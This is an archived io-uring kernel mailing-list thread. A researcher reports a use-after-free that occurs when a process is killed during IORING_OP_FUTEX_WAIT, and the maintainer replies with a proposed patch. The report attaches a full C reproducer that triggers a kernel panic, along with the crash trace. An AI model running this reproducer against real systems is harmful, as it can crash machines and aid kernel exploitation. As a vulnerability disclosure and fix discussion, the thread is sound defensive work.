public inbox for io-uring@vger.kernel.org
 help / color / mirror / Atom feed
* use-after-free if killed while in IORING_OP_FUTEX_WAIT
@ 2025-06-04 13:58 rtm
  2025-06-04 14:12 ` Jens Axboe
  0 siblings, 1 reply; 3+ messages in thread
From: rtm @ 2025-06-04 13:58 UTC (permalink / raw)
  To: Jens Axboe, Pavel Begunkov, io-uring

[-- Attachment #1: Type: text/plain, Size: 2033 bytes --]

If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
to exit_mm() causes the futex_private_hash to be freed, along with its
buckets' locks, while the iouring request still exists. When (a little
later in do_exit()) the iouring fd is fput(), the resulting
futex_unqueue() tries to use the freed memory that
req->async_data->lock_ptr points to.

I've attached a demo:

# cc uring46b.c
# ./a.out
killing child
BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
[6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
Oops [#1]
Modules linked in:
CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE 
Hardware name: riscv-virtio,qemu (DT)
Workqueue: iou_exit io_ring_exit_work
epc : spin_dump+0x38/0x6e
 ra : spin_dump+0x30/0x6e
epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
...
status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
[<ffffffff80003354>] spin_dump+0x38/0x6e
[<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
[<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
[<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
[<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
[<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
[<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
[<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
[<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
[<ffffffff80057f0a>] process_one_work+0x132/0x2fe
[<ffffffff8005888c>] worker_thread+0x21e/0x2fe
[<ffffffff80060428>] kthread+0xe8/0x1ba
[<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
[<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04 
---[ end trace 0000000000000000 ]---
Kernel panic - not syncing: Fatal exception
---[ end Kernel panic - not syncing: Fatal exception ]---

Robert Morris
rtm@mit.edu


[-- Attachment #2: uring46b.c --]
[-- Type: application/octet-stream, Size: 6211 bytes --]

#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <linux/fs.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <linux/io_uring.h>

int dirfd = -1;
int pfds[2];
int sock = -1;

//
// adapted from:
// https://unixism.net/loti/low_level.html
// https://github.com/shuveb/io_uring-by-example
//

#define QUEUE_DEPTH 1
#define BLOCK_SZ    1024

struct app_io_sq_ring {
    unsigned *head;
    unsigned *tail;
    unsigned *ring_mask;
    unsigned *ring_entries;
    unsigned *flags;
    unsigned *array;
};

struct app_io_cq_ring {
    unsigned *head;
    unsigned *tail;
    unsigned *ring_mask;
    unsigned *ring_entries;
    struct io_uring_cqe *cqes;
};

struct submitter {
    int ring_fd;
    struct app_io_sq_ring sq_ring;
    struct io_uring_sqe *sqes;
    struct app_io_cq_ring cq_ring;
};

struct file_info {
    off_t file_sz;
    struct iovec iovecs[];      /* Referred by readv/writev */
};

int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
    return (int) syscall(__NR_io_uring_setup, entries, p);
}

int io_uring_enter(int ring_fd, unsigned int to_submit,
                          unsigned int min_complete, unsigned int flags)
{
    return (int) syscall(__NR_io_uring_enter, ring_fd, to_submit, min_complete,
                   flags, NULL, 0);
}

int app_setup_uring(struct submitter *s) {
    struct app_io_sq_ring *sring = &s->sq_ring;
    struct app_io_cq_ring *cring = &s->cq_ring;
    struct io_uring_params p;
    void *sq_ptr, *cq_ptr;

    memset(&p, 0, sizeof(p));
    s->ring_fd = io_uring_setup(QUEUE_DEPTH, &p);
    if (s->ring_fd < 0) {
        perror("io_uring_setup");
        return 1;
    }

    int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
    int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);

    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        if (cring_sz > sring_sz) {
            sring_sz = cring_sz;
        }
        cring_sz = sring_sz;
    }

    sq_ptr = mmap(0, sring_sz, PROT_READ | PROT_WRITE, 
            MAP_SHARED | MAP_POPULATE,
            s->ring_fd, IORING_OFF_SQ_RING);
    if (sq_ptr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        cq_ptr = sq_ptr;
    } else {
        cq_ptr = mmap(0, cring_sz, PROT_READ | PROT_WRITE, 
                MAP_SHARED | MAP_POPULATE,
                s->ring_fd, IORING_OFF_CQ_RING);
        if (cq_ptr == MAP_FAILED) {
            perror("mmap");
            return 1;
        }
    }

    sring->head = sq_ptr + p.sq_off.head;
    sring->tail = sq_ptr + p.sq_off.tail;
    sring->ring_mask = sq_ptr + p.sq_off.ring_mask;
    sring->ring_entries = sq_ptr + p.sq_off.ring_entries;
    sring->flags = sq_ptr + p.sq_off.flags;
    sring->array = sq_ptr + p.sq_off.array;

    s->sqes = mmap(0, p.sq_entries * sizeof(struct io_uring_sqe),
            PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
            s->ring_fd, IORING_OFF_SQES);
    if (s->sqes == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    cring->head = cq_ptr + p.cq_off.head;
    cring->tail = cq_ptr + p.cq_off.tail;
    cring->ring_mask = cq_ptr + p.cq_off.ring_mask;
    cring->ring_entries = cq_ptr + p.cq_off.ring_entries;
    cring->cqes = cq_ptr + p.cq_off.cqes;

    return 0;
}

int submit_to_sq(char *file_path, struct submitter *s) {
    struct file_info *fi;

    int file_fd = open(file_path, O_RDONLY);
    if (file_fd < 0 ) {
        perror("open");
        return 1;
    }

    struct app_io_sq_ring *sring = &s->sq_ring;
    unsigned index = 0, current_block = 0, tail = 0, next_tail = 0;

    off_t file_sz = 2;
    off_t bytes_remaining = file_sz;
    int blocks = (int) file_sz / BLOCK_SZ;
    if (file_sz % BLOCK_SZ) blocks++;

    fi = malloc(sizeof(*fi) + sizeof(struct iovec) * blocks);
    if (!fi) {
        fprintf(stderr, "Unable to allocate memory\n");
        return 1;
    }
    fi->file_sz = file_sz;

    while (bytes_remaining) {
        off_t bytes_to_read = bytes_remaining;
        if (bytes_to_read > BLOCK_SZ)
            bytes_to_read = BLOCK_SZ;

        fi->iovecs[current_block].iov_len = bytes_to_read;

        void *buf;
        if( posix_memalign(&buf, BLOCK_SZ, BLOCK_SZ)) {
            perror("posix_memalign");
            return 1;
        }
        fi->iovecs[current_block].iov_base = buf;

        current_block++;
        bytes_remaining -= bytes_to_read;
    }

    next_tail = tail = *sring->tail;
    next_tail++;
    index = tail & *s->sq_ring.ring_mask;
    struct io_uring_sqe *sqe = &s->sqes[index];
    sqe->flags = 0;
    sqe->off = 0;
    sring->array[index] = index;
    tail = next_tail;

    sqe->len = 0;
    sqe->optval = 0x80000000;

    static char buf[32];
    memset(buf, 0xff, sizeof(buf));
    *(long*)buf = 0xffffffff00000000;
    sqe->addr = (__u64) buf;

    sqe->opcode = IORING_OP_FUTEX_WAIT;
    sqe->flags = 2;
    sqe->fd = 130;

    if(*sring->tail != tail) {
        *sring->tail = tail;
    }

    int ret =  io_uring_enter(s->ring_fd, 1,1,
            IORING_ENTER_GETEVENTS);
    if(ret < 0) {
        perror("io_uring_enter");
        return 1;
    }

    return 0;
}

int
main()
{
  struct rlimit r;   
  r.rlim_cur = r.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &r);

  unlink("z");
  system("echo hi > z");

  int pid = fork();
  if(pid == 0){
    struct submitter *s;

    dirfd = open(".", 0);

    socketpair(AF_UNIX, SOCK_STREAM, 0, pfds);
    write(pfds[0], "a", 1);
    write(pfds[1], "b", 1);

    sock = socket(AF_INET, SOCK_DGRAM, 0);
    
    s = malloc(sizeof(*s));
    if (!s) {
      perror("malloc");
      exit(0);
    }
    memset(s, 0, sizeof(*s));
    
    if(app_setup_uring(s)) {
      fprintf(stderr, "Unable to setup uring!\n");
      exit(0);
    }
    
    if(submit_to_sq("z", s)) {
      fprintf(stderr, "Error reading file z\n");
      exit(0);
    }

    printf("child exiting\n");
    exit(0);
  }

  sleep(1);
  printf("killing child\n");
  kill(pid, 9);
  usleep(200000);
}

^ permalink raw reply	[flat|nested] 3+ messages in thread

* Re: use-after-free if killed while in IORING_OP_FUTEX_WAIT
  2025-06-04 13:58 use-after-free if killed while in IORING_OP_FUTEX_WAIT rtm
@ 2025-06-04 14:12 ` Jens Axboe
  2025-06-04 16:22   ` Jens Axboe
  0 siblings, 1 reply; 3+ messages in thread
From: Jens Axboe @ 2025-06-04 14:12 UTC (permalink / raw)
  To: rtm, Pavel Begunkov, io-uring

On 6/4/25 7:58 AM, rtm@csail.mit.edu wrote:
> If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
> to exit_mm() causes the futex_private_hash to be freed, along with its
> buckets' locks, while the iouring request still exists. When (a little
> later in do_exit()) the iouring fd is fput(), the resulting
> futex_unqueue() tries to use the freed memory that
> req->async_data->lock_ptr points to.
> 
> I've attached a demo:
> 
> # cc uring46b.c
> # ./a.out
> killing child
> BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
> Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
> Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
> [6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
> Oops [#1]
> Modules linked in:
> CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE 
> Hardware name: riscv-virtio,qemu (DT)
> Workqueue: iou_exit io_ring_exit_work
> epc : spin_dump+0x38/0x6e
>  ra : spin_dump+0x30/0x6e
> epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
> ...
> status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
> [<ffffffff80003354>] spin_dump+0x38/0x6e
> [<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
> [<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
> [<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
> [<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
> [<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
> [<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
> [<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
> [<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
> [<ffffffff80057f0a>] process_one_work+0x132/0x2fe
> [<ffffffff8005888c>] worker_thread+0x21e/0x2fe
> [<ffffffff80060428>] kthread+0xe8/0x1ba
> [<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
> [<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
> Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04 
> ---[ end trace 0000000000000000 ]---
> Kernel panic - not syncing: Fatal exception
> ---[ end Kernel panic - not syncing: Fatal exception ]---

Thanks, I'll take a look!

-- 
Jens Axboe


^ permalink raw reply	[flat|nested] 3+ messages in thread

* Re: use-after-free if killed while in IORING_OP_FUTEX_WAIT
  2025-06-04 14:12 ` Jens Axboe
@ 2025-06-04 16:22   ` Jens Axboe
  0 siblings, 0 replies; 3+ messages in thread
From: Jens Axboe @ 2025-06-04 16:22 UTC (permalink / raw)
  To: rtm, Pavel Begunkov, io-uring

On 6/4/25 8:12 AM, Jens Axboe wrote:
> On 6/4/25 7:58 AM, rtm@csail.mit.edu wrote:
>> If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
>> to exit_mm() causes the futex_private_hash to be freed, along with its
>> buckets' locks, while the iouring request still exists. When (a little
>> later in do_exit()) the iouring fd is fput(), the resulting
>> futex_unqueue() tries to use the freed memory that
>> req->async_data->lock_ptr points to.
>>
>> I've attached a demo:
>>
>> # cc uring46b.c
>> # ./a.out
>> killing child
>> BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
>> Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
>> Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
>> [6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
>> Oops [#1]
>> Modules linked in:
>> CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE 
>> Hardware name: riscv-virtio,qemu (DT)
>> Workqueue: iou_exit io_ring_exit_work
>> epc : spin_dump+0x38/0x6e
>>  ra : spin_dump+0x30/0x6e
>> epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
>> ...
>> status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
>> [<ffffffff80003354>] spin_dump+0x38/0x6e
>> [<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
>> [<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
>> [<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
>> [<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
>> [<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
>> [<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
>> [<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
>> [<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
>> [<ffffffff80057f0a>] process_one_work+0x132/0x2fe
>> [<ffffffff8005888c>] worker_thread+0x21e/0x2fe
>> [<ffffffff80060428>] kthread+0xe8/0x1ba
>> [<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
>> [<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
>> Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04 
>> ---[ end trace 0000000000000000 ]---
>> Kernel panic - not syncing: Fatal exception
>> ---[ end Kernel panic - not syncing: Fatal exception ]---
> 
> Thanks, I'll take a look!

I think this would be the least intrusive fix, and also avoid fiddling
with mmget() for the PRIVATE case. I'll write a test case for this and
send it out as a real patch.


diff --git a/io_uring/futex.c b/io_uring/futex.c
index 383e0d99ad27..246bfb862db9 100644
--- a/io_uring/futex.c
+++ b/io_uring/futex.c
@@ -148,6 +148,8 @@ int io_futex_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
 	    !futex_validate_input(iof->futex_flags, iof->futex_mask))
 		return -EINVAL;
 
+	/* Mark as inflight, so file exit cancelation will find it */
+	io_req_track_inflight(req);
 	return 0;
 }
 
@@ -194,6 +196,8 @@ int io_futexv_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
 		return ret;
 	}
 
+	/* Mark as inflight, so file exit cancelation will find it */
+	io_req_track_inflight(req);
 	iof->futexv_unqueued = 0;
 	req->flags |= REQ_F_ASYNC_DATA;
 	req->async_data = ifd;
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index c7a9cecf528e..cf759c172083 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -408,7 +408,12 @@ static void io_clean_op(struct io_kiocb *req)
 	req->flags &= ~IO_REQ_CLEAN_FLAGS;
 }
 
-static inline void io_req_track_inflight(struct io_kiocb *req)
+/*
+ * Mark the request as inflight, so that file cancelation will find it.
+ * Can be used if the file is an io_uring instance, or if the request itself
+ * relies on ->mm being alive for the duration of the request.
+ */
+inline void io_req_track_inflight(struct io_kiocb *req)
 {
 	if (!(req->flags & REQ_F_INFLIGHT)) {
 		req->flags |= REQ_F_INFLIGHT;
diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
index 0ea7a435d1de..d59c12277d58 100644
--- a/io_uring/io_uring.h
+++ b/io_uring/io_uring.h
@@ -83,6 +83,7 @@ void io_add_aux_cqe(struct io_ring_ctx *ctx, u64 user_data, s32 res, u32 cflags)
 bool io_req_post_cqe(struct io_kiocb *req, s32 res, u32 cflags);
 void __io_commit_cqring_flush(struct io_ring_ctx *ctx);
 
+void io_req_track_inflight(struct io_kiocb *req);
 struct file *io_file_get_normal(struct io_kiocb *req, int fd);
 struct file *io_file_get_fixed(struct io_kiocb *req, int fd,
 			       unsigned issue_flags);

-- 
Jens Axboe

^ permalink raw reply related	[flat|nested] 3+ messages in thread

end of thread, other threads:[~2025-06-04 16:23 UTC | newest]

Thread overview: 3+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2025-06-04 13:58 use-after-free if killed while in IORING_OP_FUTEX_WAIT rtm
2025-06-04 14:12 ` Jens Axboe
2025-06-04 16:22   ` Jens Axboe

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox